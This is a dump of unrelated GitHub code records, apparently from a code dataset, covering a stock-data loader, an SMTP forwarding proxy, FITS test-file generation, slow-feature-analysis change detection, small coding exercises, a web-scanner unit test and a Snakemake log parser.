: {'$gte': start_date, '$lt': end_date}}\n return self.load_items(self.collection, query)\n\n def load_comp_data_btn_attr_values(self, comp_name: str, attr: str, min: float, max: float):\n \"\"\"\n Loads company data that's between specified range.\n \"\"\"\n query = {'Name': comp_name, attr : {'$gte': min, '$lt': max}}\n return self.load_items(self.collection, query)\n\n def load_comp_data_btn_vals_and_dates(self, comp_name: str, attr: str, start_date: datetime, end_date: datetime, min: float, max: float):\n \"\"\"\n Loads company data that's between specified range and between dates.\n \"\"\"\n query = {'Name': comp_name, attr : {'$gte': min, '$lt': max}}\n self.load_items(self.collection, query)\n","repo_name":"maciejbihun9/world_analizer","sub_path":"src/stock_analizer/google_finance/stock_analisis/stock_data_manager.py","file_name":"stock_data_manager.py","file_ext":"py","file_size_in_byte":10796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74606602332","text":"class Solution:\n def subdomainVisits(self, cpdomains: List[str]) -> List[str]:\n count = collections.Counter()\n for cp in cpdomains:\n n, s = cp.split()\n count[s] += int(n)\n for i in range(len(s)):\n if s[i] == \".\":\n count[s[i+1:]] += int(n)\n return [\"%d %s\" % (count[k], k) for k in count]","repo_name":"kevinjshah2207/LeetCode_Summer_21","sub_path":"subdomain-visit-count/subdomain-visit-count.py","file_name":"subdomain-visit-count.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"6029525404","text":"import socket\nfrom ClientToProxy import *\nfrom ProxyToSMTP import *\nimport threading\ndef listen(host,port):\n tcp_socket=socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)\n tcp_socket.bind((host, port))\n tcp_socket.listen()\n print(\"Start Listening \"+host+\":\"+str(port))\n while True:\n conn, (host,port) = tcp_socket.accept()\n print(\"\\r\\n===============ClientToProxy===============\")\n receive=Receive(conn)\n message = receive.get_message()\n conn.close()\n # print(message)\n if message:\n SMTP_host,SMTP_port= \"smtp.qq.com\",25\n send=Send(SMTP_host,SMTP_port)\n print(\"\\r\\n===============ProxyToSMTP===============\")\n send_thread = threading.Thread(target=send.SendToSMTP,args=(message,),daemon = True)\n send_thread.start()\n # send_thread.close()\n else:\n print(\"Please Resend\")\n continue","repo_name":"Magi2B0y/SMTP_Proxy","sub_path":"build_socket.py","file_name":"build_socket.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"40832678153","text":"\"\"\"Kernel Phase FITS Format Test File\n\nThis module contains a single function which produces a test Kernel Phase FITS\nfile according to the specifications in the format document. \n\nExample\n-------\n\nTo produce the test file simply run the following: \n\n $ python dummyfile.py filename.fits \n\n\"\"\"\n\nimport fitsio \nimport argparse \nimport numpy as np\n\nfrom numpy.random import randint \n\ndef create_dummy(filename): \n \"\"\"Create dummy file \n\n This is the main function which takes in a name and produces the fake file. \n\n Parameters\n ----------\n filename (str) : the name of the dummy file \n\n \"\"\" \n\n #Create the parameters for the file \n num_kernels = randint(low=10, high=1000) \n num_frames = randint(low=5, high=50) \n num_pixels = 2**randint(low=2, high=8)\n num_apertures = randint(low=56, high=752) \n num_wavelengths = randint(low=1, high=11)\n num_uv = randint(low=100, high=200) \n \n #--- Required HDUs ---# \n primary = np.zeros((num_frames, num_wavelengths, num_pixels, num_pixels)) \n aperture = np.zeros((num_apertures, 3)) \n uv_points = np.zeros((num_uv, 3)) \n ker_mat = np.zeros((num_kernels, num_uv)) \n blm_mat = np.zeros((num_uv, num_apertures)) \n kp_data = np.zeros((num_frames, num_wavelengths, num_kernels)) \n kp_sigm = np.zeros((num_frames, num_wavelengths, num_kernels))\n detpa = np.zeros((num_frames)) \n cvis_data = np.zeros((2, num_frames, num_wavelengths, num_uv)) \n\n #CWAVEL is a table \n cwavel = {} \n cwavel[\"CWAVEL\"] = np.zeros(num_wavelengths)\n cwavel[\"DWAVEL\"] = np.zeros(num_wavelengths) \n \n #--- Optional HDUs ---# \n ka_data = kp_data\n ka_sigm = kp_sigm \n cal_mat = np.zeros((randint(low=2, high=20), num_kernels)) \n kp_cov = np.zeros((num_frames, num_wavelengths, num_kernels, num_kernels)) \n ka_cov = kp_cov \n full_cov = np.zeros((num_frames, num_wavelengths, 2, num_kernels, 2,\n num_kernels))\n \n #IMSHIFT is a table \n imshift = {} \n imshift[\"XSHIFT\"] = np.zeros(num_frames)\n imshift[\"YSHIFT\"] = np.zeros(num_frames) \n\n #Create the primary header \n prim_header = {\"PSCALE\":3.14, \"DIAM\":1.62, \"EXPTIME\":2.72, \"GAIN\":1.0,\n \"CONTENT\":\"KFITS1\"} \n\n #Open the file for writing\n with fitsio.FITS(filename, \"rw\") as f: \n \n #Required HDUs\n f.write(primary, header=prim_header, extname=\"PRIMARY\") \n f.write(aperture, extname=\"APERTURE\") \n f.write(uv_points, extname=\"UV-PLANE\") \n f.write(ker_mat, extname=\"KER-MAT\") \n f.write(blm_mat, extname=\"BLM-MAT\") \n f.write(kp_data, extname=\"KP-DATA\") \n f.write(kp_sigm, extname=\"KP-SIGM\") \n f.write(cwavel, extname=\"CWAVEL\")\n f.write(detpa, extname=\"DETPA\") \n f.write(cvis_data, extname=\"CVIS-DATA\") \n\n #Optional HDUs\n f.write(ka_data, extname=\"KA-DATA\") \n f.write(ka_sigm, extname=\"KA-SIGM\") \n f.write(cal_mat, extname=\"CAL-MAT\") \n f.write(kp_cov, extname=\"KP-COV\") \n f.write(ka_cov, extname=\"KA-COV\") \n f.write(full_cov, extname=\"FULL-COV\") \n f.write(imshift, extname=\"IMSHIFT\")\n \nif __name__ == \"__main__\": \n\n #Parse the inputted file names \n parser = argparse.ArgumentParser(\n description=\"Kernel phase FITS file validator.\"\n )\n\n parser.add_argument(\"files\", type=str, nargs=\"+\",\n help=\"Filename of the dummy file\"\n )\n \n args = parser.parse_args() \n\n #Iterate through the list of files and produce them \n for file_ in args.files:\n\n create_dummy(file_) \n \n","repo_name":"apchsh/kp_fits","sub_path":"dummyfile.py","file_name":"dummyfile.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7405355580","text":"\"\"\"\nSlow feature analysis\nC. Wu, B. Du, and L. Zhang, “Slow feature analysis for change detection in multispectral imagery,” IEEE Trans. Geosci. Remote Sens., vol. 52, no. 5, pp. 2858–2874, 2014.\n\"\"\"\n\nimport numpy as np\nfrom scipy.linalg import eig\nfrom scipy.stats import chi2\nfrom sklearn.cluster import KMeans\n\nfrom Methodology.util.cluster_util import otsu\nimport gdal\nimport time\nimport imageio\n\n\nclass ISFA(object):\n def __init__(self, img_X, img_Y, data_format='CHW'):\n \"\"\"\n the init function\n :param img_X: former temporal image, its dim is (band_count, width, height)\n :param img_Y: latter temporal image, its dim is (band_count, width, height)\n \"\"\"\n if data_format == 'HWC':\n self.img_X = np.transpose(img_X, [2, 0, 1])\n self.img_Y = np.transpose(img_Y, [2, 0, 1])\n else:\n self.img_X = img_X\n self.img_Y = img_Y\n\n channel, height, width = self.img_X.shape\n self.L = np.zeros((channel - 2, channel)) # (C-2, C)\n for i in range(channel - 2):\n self.L[i, i] = 1\n self.L[i, i + 1] = -2\n self.L[i, i + 2] = 1\n self.Omega = np.dot(self.L.T, self.L) # (C, C)\n self.norm_method = ['LSR', 'NR', 'OR']\n\n def isfa(self, max_iter=30, epsilon=1e-6, norm_trans=False, regular=False):\n \"\"\"\n extract change and unchange info of temporal images based on USFA\n if max_iter == 1, ISFA is equal to SFA\n :param max_iter: the maximum count of iteration\n :param epsilon: convergence threshold\n :param norm_trans: whether normalize the transformation matrix\n :return:\n ISFA_variable: ISFA variable, its dim is (band_count, width * height)\n lamb: last lambda\n all_lambda: all lambda in convergence process\n trans_mat: transformation matrix\n T: last IWD, if max_iter == 1, T is chi-square distance\n weight: the unchanged probability of each pixel\n \"\"\"\n\n bands_count, img_height, img_width = self.img_X.shape\n P = img_height * img_width\n # row-major order after reshape\n img_X = np.reshape(self.img_X, (-1, img_height * img_width)) # (band, width * height)\n img_Y = np.reshape(self.img_Y, (-1, img_height * img_width)) # (band, width * height)\n lamb = 100 * np.ones((bands_count, 1))\n all_lambda = []\n weight = np.ones((img_width, img_height)) # (1, width * height)\n # weight[302:343, 471] = 1 # init seed\n # weight[209, 231:250] = 1\n # weight[335:362, 570] = 1\n # weight[779, 332:387] = 1\n\n weight = np.reshape(weight, (-1, img_width * img_height))\n for _iter in range(max_iter):\n sum_w = np.sum(weight)\n mean_X = np.sum(weight * img_X, axis=1, keepdims=True) / np.sum(weight) # (band, 1)\n mean_Y = np.sum(weight * img_Y, axis=1, keepdims=True) / np.sum(weight) # (band, 1)\n center_X = (img_X - mean_X)\n center_Y = (img_Y - mean_Y)\n\n # cov_XY = covw(center_X, center_Y, weight) # (2 * band, 2 * band)\n # cov_X = cov_XY[0:bands_count, 0:bands_count]\n # cov_Y = cov_XY[bands_count:2 * bands_count, bands_count:2 * bands_count]\n var_X = np.sum(weight * np.power(center_X, 2), axis=1, keepdims=True) / ((P - 1) * sum_w / P)\n var_Y = np.sum(weight * np.power(center_Y, 2), axis=1, keepdims=True) / ((P - 1) * sum_w / P)\n std_X = np.reshape(np.sqrt(var_X), (bands_count, 1))\n std_Y = np.reshape(np.sqrt(var_Y), (bands_count, 1))\n\n # normalize image\n norm_X = center_X / std_X\n norm_Y = center_Y / std_Y\n diff_img = (norm_X - norm_Y)\n mat_A = np.dot(weight * diff_img, diff_img.T) / ((P - 1) * sum_w / P)\n mat_B = (np.dot(weight * norm_X, norm_X.T) +\n np.dot(weight * norm_Y, norm_Y.T)) / (2 * (P - 1) * sum_w / P)\n if regular:\n penalty = np.trace(mat_B) / np.trace(self.Omega)\n mat_B += penalty * self.Omega\n # solve generalized eigenvalue problem and get eigenvalues and eigenvector\n eigenvalue, eigenvector = eig(mat_A, mat_B)\n eigenvalue = eigenvalue.real # discard imaginary part\n idx = eigenvalue.argsort()\n eigenvalue = eigenvalue[idx]\n\n # make sure the max absolute value of vector is 1,\n # and the final result will be more closer to the matlab result\n aux = np.reshape(np.abs(eigenvector).max(axis=0), (1, bands_count))\n eigenvector = eigenvector / aux\n\n # print sqrt(lambda)\n if (_iter + 1) == 1:\n print('sqrt lambda:')\n print(np.sqrt(eigenvalue))\n\n eigenvalue = np.reshape(eigenvalue, (bands_count, 1)) # (band, 1)\n threshold = np.max(np.abs(np.sqrt(lamb) - np.sqrt(eigenvalue)))\n # if sqrt(lambda) converge\n if threshold < epsilon:\n break\n lamb = eigenvalue\n all_lambda = lamb if (_iter + 1) == 1 else np.concatenate((all_lambda, lamb), axis=1)\n # the order of the slowest features is determined by the order of the eigenvalues\n trans_mat = eigenvector[:, idx]\n # satisfy the constraints(3)\n if norm_trans:\n output_signal_std = 1 / np.sqrt(np.diag(np.dot(trans_mat.T, np.dot(mat_B, trans_mat))))\n trans_mat = output_signal_std * trans_mat\n ISFA_variable = np.dot(trans_mat.T, norm_X) - np.dot(trans_mat.T, norm_Y)\n\n if (_iter + 1) == 1:\n T = np.sum(np.square(ISFA_variable) / np.sqrt(lamb), axis=0, keepdims=True) # chi square\n else:\n T = np.sum(np.square(ISFA_variable) / np.sqrt(lamb), axis=0, keepdims=True) # IWD\n weight = 1 - chi2.cdf(T, bands_count)\n\n if (_iter + 1) == max_iter:\n print('the lambda may not be converged')\n else:\n print('the lambda is converged, the iteration is %d' % (_iter + 1))\n\n return ISFA_variable, lamb, all_lambda, trans_mat, T, weight\n\n\ndef main():\n data_set_X = gdal.Open('../../../Dataset/Landsat/Taizhou/2000TM') # data set X\n data_set_Y = gdal.Open('../../../Dataset/Landsat/Taizhou/2003TM') # data set Y\n\n img_width = data_set_X.RasterXSize # image width\n img_height = data_set_X.RasterYSize # image height\n\n img_X = data_set_X.ReadAsArray(0, 0, img_width, img_height)\n img_Y = data_set_Y.ReadAsArray(0, 0, img_width, img_height)\n\n channel, img_height, img_width = img_X.shape\n tic = time.time()\n sfa = ISFA(img_X, img_Y)\n # when max_iter is set to 1, ISFA becomes SFA\n bn_SFA_variable, bn_lamb, bn_all_lambda, bn_trans_mat, bn_iwd, bn_isfa_w = sfa.isfa(max_iter=50, epsilon=1e-3,\n norm_trans=True)\n sqrt_chi2 = np.sqrt(bn_iwd)\n bcm = np.ones((1, img_height * img_width))\n thre = otsu(sqrt_chi2)\n bcm[sqrt_chi2 > thre] = 255\n bcm = np.reshape(bcm, (img_height, img_width))\n imageio.imwrite('ISFA_Taizhou.png', bcm)\n toc = time.time()\n print(toc - tic)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ChenHongruixuan/ChangeDetectionRepository","sub_path":"Methodology/Traditional/SFA/isfa.py","file_name":"isfa.py","file_ext":"py","file_size_in_byte":7352,"program_lang":"python","lang":"en","doc_type":"code","stars":421,"dataset":"github-code","pt":"32"} +{"seq_id":"4695054143","text":"\"\"\"G. Закручивающаяся спираль\nВолшебная фея отправила Гоше послание. Чтобы никто не смог перехватить сообщение,\nфея его закодировала. Послание записано в матрице по спирали,\nначиная с левого верхнего угла вправо.\nПомогите Гоше прочитать сообщение.\n\"\"\"\nwith open(\"input.txt\") as f:\n n = int(f.readline())\n m = int(f.readline())\n matrix = []\n for i in range(n):\n matrix.append(f.readline().split())\nA = 1\ni, j = 0, 0\nN = n * m\n\nfor p in range(m//2+1):\n for right in range(p, m-1-p):\n if A > N:\n break\n else:\n print(matrix[i][j], end=\" \")\n A += 1\n j += 1\n for down in range(p, n-1-p):\n if A > N:\n break\n else:\n print(matrix[i][j], end=\" \")\n A += 1\n i += 1\n for left in range(p, m-1-p):\n if A > N:\n break\n else:\n print(matrix[i][j], end=\" \")\n A += 1\n j -= 1\n for up in range(p, n-1-p):\n if A > N:\n break\n else:\n print(matrix[i][j], end=\" \")\n A += 1\n i -= 1\n i += 1\n j += 1\n\nif m == n and m%2==1:\n print(matrix[m//2][n//2])\n\n\"\"\"\ndef spiralOrder(matrix):\n result = []\n while matrix:\n result.extend(matrix.pop(0))\n matrix = list(zip(*matrix))[::-1]\n return result\nmatrix = [\n [1, 2, 3, 4],\n [12, 13, 14, 5],\n [11, 16, 15, 6],\n [10, 9, 8, 7],\n]\nprint(\" \".join(str(x) for x in spiralOrder(matrix)))\n\"\"\"","repo_name":"koxximus/algoritms","sub_path":"g3.py","file_name":"g3.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71341543131","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\n\nfrom captcha.views import *\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', 'cat.views.index', name='home'),\n url(r'^captcha/', 'captcha.views.image', name='image'),\n url(r'^populate/', 'captcha.views.populate', name='populate'),\n url(r'^export/', 'captcha.views.results', name='results'),\n\n\n \t\n]\n","repo_name":"Lohit13/captchaanalysis","sub_path":"cat/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31635011404","text":"import unittest\nfrom unittest.mock import Mock\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urlparse, parse_qs\nfrom userControlledJavascriptEvent import UserControlledJavascriptEventScanRule\n\n\nclass UserControlledJavascriptEventScanRuleTest(unittest.TestCase):\n def setUp(self):\n self.scanner = UserControlledJavascriptEventScanRule()\n\n def test_scan_http_response_receive(self):\n html_content = \"\"\"\n \n \n

Test HTML

\n
\n \n \n \n \n Click Me\n \n
\n \n \n \n\n \"\"\"\n\n response = Mock()\n response.status_code = 200\n response.headers = {\"Content-Type\": \"text/html\"}\n response.content = html_content.encode(\"utf-8\")\n response.url = \"https://example.com/?username=test&password=123\"\n\n parsed_url = urlparse(response.url)\n query_params = parse_qs(parsed_url.query)\n\n soup = BeautifulSoup(html_content, \"html.parser\")\n # self.scanner.scan_http_response_receive(response, soup)\n # print(self.scanner.scan_http_response_receive(response, soup))\n print(self.scanner.scan_http_response_receive(response, soup))\n self.assertEqual(self.scanner.scan_http_response_receive(response, soup),\n \"CWE-200: Improper Input Validation\")\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"macsta31/reverse_engineering_api","sub_path":"api/tools/userControlledJavascriptEvent/userControlledJavScriptEventScanTest.py","file_name":"userControlledJavScriptEventScanTest.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"19818072572","text":"import json\n\n\n# check the type of data in list or dict\ndef def_type(value):\n type = None\n if isinstance(value, int):\n type = 'int'\n elif isinstance(value, float):\n type = 'float'\n elif isinstance(value, str):\n type = 'str'\n else:\n print(\"[Error]: unexpected basic data type, data = {}\".format(value))\n exit(1)\n\n return type\n\n\n# restore the data from string to original type before serialized\ndef convert_type(unit):\n if unit[1] == 'int':\n return int(unit[0])\n elif unit[1] == 'float':\n return float(unit[0])\n elif unit[1] == 'str':\n return str(unit[0])\n\n\n# serialize the data\ndef serializer(data):\n data_str = ''\n if isinstance(data, list):\n data_str = data_str + 'list' + '\\n'\n for i in range(len(data)):\n t = def_type(data[i])\n data_str = data_str + str(data[i]) + '_' + t + '\\t'\n return data_str[:-1]\n elif isinstance(data, dict):\n data_str = data_str + 'dict' + '\\n'\n keys = ''\n values = ''\n for key in data.keys():\n key_type = def_type(key)\n keys = keys + key + '_' + key_type + '\\t'\n value_type = def_type(data[key])\n values = values + str(data[key]) + '_' + value_type + '\\t'\n data_str = data_str + keys[:-1] + '\\n' + values[:-1]\n return data_str\n\n\n# deserialize data read from file\ndef deserializer(lines):\n if len(lines) == 0:\n return None\n elif lines[0] == 'list':\n data_restored = []\n if len(lines) > 1:\n lists = lines[1].split('\\t')\n for list in lists:\n data_restored.append(convert_type(list.split('_')))\n elif lines[0] == 'dict':\n data_restored = {}\n if len(lines) > 1:\n keys = lines[1].split('\\t')\n values = lines[2].split('\\t')\n keys_restored = []\n values_restored = []\n for key in keys:\n keys_restored.append(convert_type(key.split('_')))\n for value in values:\n values_restored.append(convert_type(value.split('_')))\n data_restored = dict(zip(keys_restored, values_restored))\n return data_restored\n\n\n# compare if 2 data structure are the same\ndef my_compare(ds1, ds2):\n if type(ds1) != type(ds2):\n return False\n\n if len(ds1) != len(ds2):\n return False\n if isinstance(ds1, list):\n for i in range(len(ds1)):\n if ds1[i] != ds2[i] or type(ds1[i]) != type(ds2[i]):\n return False\n if isinstance(ds1, dict):\n for key in ds1.keys():\n if key not in ds2.keys():\n return False\n if ds1[key] != ds2[key] or type(ds1[key]) != type(ds2[key]):\n return False\n\n return True\n\n\ndef getFileLines(fname):\n fhandle = open(fname)\n lines = []\n for line in fhandle:\n line = line.rstrip()\n if line:\n lines.append(line)\n fhandle.close()\n return lines\n\n\nif __name__ == '__main__':\n json_path = input(\"Please key in path to the json file: \")\n fh = open(json_path)\n data = json.load(fh)\n fh.close()\n data_serialized = serializer(data)\n filename = input(\"Please key in file name:\")\n with open(filename, 'w') as f:\n f.write(data_serialized)\n f.close()\n\n lines = getFileLines(filename)\n data_deserialized = deserializer(lines)\n same_data = my_compare(data, data_deserialized)\n\n if same_data:\n print(\"Successful! Deserialized data {} is the same as original file.\".format(data_deserialized))\n else:\n print(\"Failed! Deserialized data {} is different from original file.\".format(data_deserialized))\n","repo_name":"jingrui0615/MH8811-G1901967D","sub_path":"05/Homework5.py","file_name":"Homework5.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12240630490","text":"import gym\nimport atari_py\n\n#env = gym.make('CartPole-v0')\nenv = gym.make('SpaceInvaders-v0')\nenv.reset()\n\nfor _ in range(1000):\n env.render()\n env.step(env.action_space.sample())\n \nenv.close()\n\nprint(atari_py.list_games())","repo_name":"baihuaxie/drl-lib","sub_path":"flow_tests/test_gym.py","file_name":"test_gym.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72889374810","text":"def sn(numList):\n global n\n n = n+1\n print (\"The number of times the function executes \", n)\n if len(numList) == 1:\n return numList[0]\n else:\n r = numList[0]\n print (\"The function takes the value of r as\", r)\n s = sn(numList[1:])# recursion step\n print (\"The value of s in this step is\", s)\n return r + s\nn = 0\nprint (sn([6,8,10,5,7]))\n","repo_name":"Bama-S/python_course_material","sub_path":"1/codes/intro/recursioneg2.py","file_name":"recursioneg2.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"17767829886","text":"#! /home/student/c/cstenkamp/miniconda/envs/derive_conceptualspaces/bin/python3\n\n#TODO be able to analyze 737922 from backup-28-02-2022. If that shows me the error, this code achieved it's goal.\n\nimport os\nimport argparse\nfrom os.path import join, isfile, abspath, dirname\nfrom datetime import datetime\nfrom collections import Counter\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"..\"))\n\nfrom dotenv.main import load_dotenv\n\nfrom util.logfile_for import print_singlejob, load_acctfile, extract_error, read_errorfile, apply_dotenv_vars\nimport util\nfrom ikw_grid.sge_status import get_status\n\nflatten = lambda l: [item for sublist in l for item in sublist]\n\ndef parse_command_line_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('start_pid', help='ID of the first smk_runner that startet it all')\n parser.add_argument('--base_dir', '-b', help='Base-dir where the smk_runner logs are', default=os.environ[\"HOME\"])\n parser.add_argument('--include_errors', '-e', help=\"If you want the tracebacks to be shown\", default=False, action=\"store_true\")\n return parser.parse_args()\n\n########################################################################################################################\n# stuff for reading the \"smk_runner.e*\" files\n\ndef read_files(pid, base_dir):\n with open(join(base_dir, f\"smk_runner.e{pid}\")) as rfile:\n errorfile = rfile.read()\n with open(join(base_dir, f\"smk_runner.o{pid}\")) as rfile:\n outputfile = rfile.read()\n return errorfile, outputfile\n\ndef get_all_jobfiles(new_job_id, base_dir):\n errorfiles, outputfiles = [], []\n for _ in range(100):\n errorfile, outputfile = read_files(new_job_id, base_dir)\n assert outputfile.split(\"\\n\")[0] == f\"This is run nr {len(errorfiles)+1}\"\n errorfiles.append(errorfile)\n outputfiles.append(outputfile)\n if any(l.startswith(\"Your job\") and l.endswith(\"has been submitted\") for l in outputfile.split(\"\\n\")):\n line = [l for l in outputfile.split(\"\\n\") if l.startswith(\"Your job\") and l.endswith(\"has been submitted\")][0]\n new_job_id = line[len(\"Your job \"):line[len(\"Your job \"):].find(\" \") + len(\"Your job \")]\n else:\n break\n for i, err in enumerate(errorfiles):\n if \"Will exit after finishing currently running jobs.\" in err.split(\"\\n\"):\n errorfiles[i] = \"\\n\".join(err.split(\"\\n\")[:err.split(\"\\n\").index(\"Will exit after finishing currently running jobs.\")])\n return errorfiles, outputfiles\n\n\ndef split_all(errorfiles):\n todo_jobs = [\"\\n\".join(i.split(\"\\n\")[i.split(\"\\n\").index(\"Job stats:\")+1:]) for i in errorfiles]\n todo_jobs = [\"\\n\".join(i.split(\"\\n\")[:[j for j, elem in enumerate(i.split(\"\\n\")) if elem.startswith(\"total\")][0]+1]) for i in todo_jobs]\n\n job_strings = [i for i in flatten([i.split(\"\\n\")[i.split(\"\\n\").index(\"Select jobs to execute...\")+1 if \"Select jobs to execute...\" in i else None:] for i in errorfiles]) if i]\n job_strings = [i for i in job_strings if i != \"Select jobs to execute...\"]\n done_inds = [n for n, i in enumerate(job_strings) if i.startswith(\"Finished job\")]\n dones = [\"\\n\".join(job_strings[i - 1:i + 2]) for i in done_inds]\n for done in dones: job_strings = \"\\n\".join(job_strings).replace(done, \"\").split(\"\\n\")\n dones = {i.split(\"\\n\")[1][len(\"Finished job \"):-1]:datetime.strptime(i.split(\"\\n\")[0][1:-1], \"%a %b %d %H:%M:%S %Y\") for i in dones}\n job_strings = [i for i in job_strings if i]\n\n start_inds = [n for n, i in enumerate(job_strings) if i.startswith(\"rule\") and i.endswith(\":\")]\n indiv_rules = [[j.strip() for j in job_strings[start_inds[i]-1:start_inds[i+1]-1]] for i in range(len(start_inds)-1)]\n #TODO rather use the fact dass die Sachen zur Rule noch eingerückt sind!! also alles eingerückte nach start_inds, und dann jeweils noch die nächstmöglichen\n # reihen die mit any of [\"Will submit the following\", \"Error-File can be found at\", \"Submitted job\"] anfangen, umrühren, fertig.\n job_infos = []\n leftover_text = []\n for nrule, rule in enumerate(indiv_rules):\n usable_lines = [j.split(\": \") for j in rule[2:([n for n, j in enumerate(rule) if j.startswith(\"Will submit\") or j.startswith(\"Resuming incomplete job\")][0]) if any(i.startswith(\"Will submit\") or i.startswith(\"Resuming incomplete job\") for i in rule) else None]]\n usable_if = lambda x: len(x) == 2 and not any(j in \": \".join(x) for j in [\"failed because of an error\"])\n leftover_text.extend([\": \".join(i) for i in usable_lines if not usable_if(i)])\n job_infos.append(dict(i for i in usable_lines if usable_if(i)))\n job_infos[-1][\"rule\"] = rule[1][len(\"rule \"):-1]\n job_infos[-1][\"timestamp\"] = datetime.strptime(rule[0][1:-1], \"%a %b %d %H:%M:%S %Y\")\n\n #TODO the order of this may be messed up if eg. \"Trying to restart job\" comes before \"Removing output files of\"\n #TODO on my local terminal, the \"building dag of jobs...\" until \"select jobs to execute...\" is yellow, the rules with their IO is green, (and other stuff I can't tell)\n # - I may be able to use these colors to split what-it-belonged-to in cases where two logs were written simultaenously to the logfile!\n for other_txt in [\"Removing output files of\", \"failed because of an error!\", \"Trying to restart job\"]:\n if any(other_txt in i for i in rule):\n tmpstr = rule[[n for n, i in enumerate(rule) if other_txt in i][0]:]\n leftover_text.extend([i for i in tmpstr if not \"Submitted job\" in i])\n rule = rule[:[n for n, i in enumerate(rule) if other_txt in i][0]]+[i for i in tmpstr if \"Submitted job\" in i]\n if any(\"Error in rule\" in i for i in rule):\n tmpstr = rule[[n for n, i in enumerate(rule) if \"Error in rule\" in i][0] - 1:]\n leftover_text.extend([i for i in tmpstr if not \"Submitted job\" in i])\n rule = rule[:[n for n, i in enumerate(rule) if \"Error in rule\" in i][0]-1]+[i for i in tmpstr if \"Submitted job\" in i]\n if any(i.startswith(\"Submitted job\") for i in rule):\n if len(rule) > [i for i, elem in enumerate(rule) if elem.startswith(\"Submitted job\")][0]+1:\n leftover_text.extend(rule[[i for i, elem in enumerate(rule) if elem.startswith(\"Submitted job\")][0]+1:])\n rule = rule[:[i for i, elem in enumerate(rule) if elem.startswith(\"Submitted job\")][0]+1]\n\n\n if any(i.startswith(\"Will submit the following:\") for i in rule):\n job_infos[-1][\"submit_command\"] = [i for i in rule if i.startswith(\"Will submit the following:\")][0].split(\"`\")[1]\n job_infos[-1][\"errorfile\"] = [i for i in rule if i.startswith(\"Error-File can be found at\")][0].split(\"`\")[1]\n job_infos[-1][\"external_id\"] = rule[-1].split(\"'\")[1]\n elif any(i.startswith(\"Resuming incomplete job\") for i in rule):\n job_infos[-1][\"external_id\"] = [i for i in rule if i.startswith(\"Resuming incomplete job\")][0].split(\"'\")[1]\n job_infos[-1][\"resuming\"] = True\n else:\n print()\n pure_resumes = []\n for resumed_job in [i for i in job_infos if i.get(\"resuming\")]:\n orig_job = [i for i in job_infos if i[\"external_id\"] == resumed_job[\"external_id\"] and not i.get(\"resuming\")]\n if len(orig_job) < 1:\n pure_resumes.append(resumed_job[\"external_id\"])\n else:\n assert len(orig_job) == 1\n assert all(v == resumed_job[k] for k, v in orig_job[0].items() if k not in [\"resuming\", \"submit_command\", \"errorfile\", \"resources\", \"timestamp\", \"resumed_at\"])\n orig_job[0].setdefault(\"resumed_at\", []).append(resumed_job[\"timestamp\"])\n job_infos = [i for i in job_infos if (not i.get(\"resuming\") or i[\"external_id\"] in pure_resumes)]\n return todo_jobs, dones, job_infos, leftover_text\n\n\ndef merge_job_infos(job_infos):\n di = {}\n for job in job_infos:\n di.setdefault(job[\"output\"], []).append(job)\n newls = []\n for vals in di.values():\n newls.append(vals[0])\n newls[-1][\"resumed_at\"] = {newls[-1][\"external_id\"]: newls[-1][\"resumed_at\"]} if \"resumed_at\" in newls[-1] else {}\n for elem in [\"timestamp\", \"external_id\", \"submit_command\"]:\n newls[-1][elem] = [newls[-1].get(elem)]\n if len(vals) >= 2:\n for i in range(1, len(vals)):\n assert all(v == vals[i].get(k) for k, v in vals[0].items() if k not in [\"resources\", \"timestamp\", \"external_id\", \"submit_command\", \"resumed_at\", \"resuming\"])\n for elem in [\"timestamp\", \"external_id\", \"submit_command\"]:\n newls[-1][elem].append(vals[i].get(elem))\n if \"resumed_at\" in vals[i]:\n newls[-1].setdefault(\"resumed_at\", {})[vals[i][\"external_id\"]] = vals[i][\"resumed_at\"]\n return newls\n\n########################################################################################################################\n\n\ndef main():\n if isfile(os.getenv(\"MA_SELECT_ENV_FILE\", \"\")):\n load_dotenv(os.environ[\"MA_SELECT_ENV_FILE\"])\n apply_dotenv_vars()\n args = parse_command_line_args()\n errorfiles, outputfiles = get_all_jobfiles(args.start_pid, args.base_dir)\n todo_jobs, dones, job_infos, leftover_text = split_all(errorfiles) #TODO consider todo_jobs and dones!\n job_infos = merge_job_infos(job_infos)\n assert len([i[\"jobid\"] for i in job_infos]) == len(set([i[\"jobid\"] for i in job_infos]))\n for info in job_infos:\n if info[\"jobid\"] in dones.keys():\n info[\"finished_at\"] = dones[info[\"jobid\"]]\n elif not \"state\" in info:\n info[\"state\"] = {i: get_status(i, status_attempts=1, silent=True, detailed=True) for i in info[\"external_id\"]}\n # assert len([i for i in job_infos if not 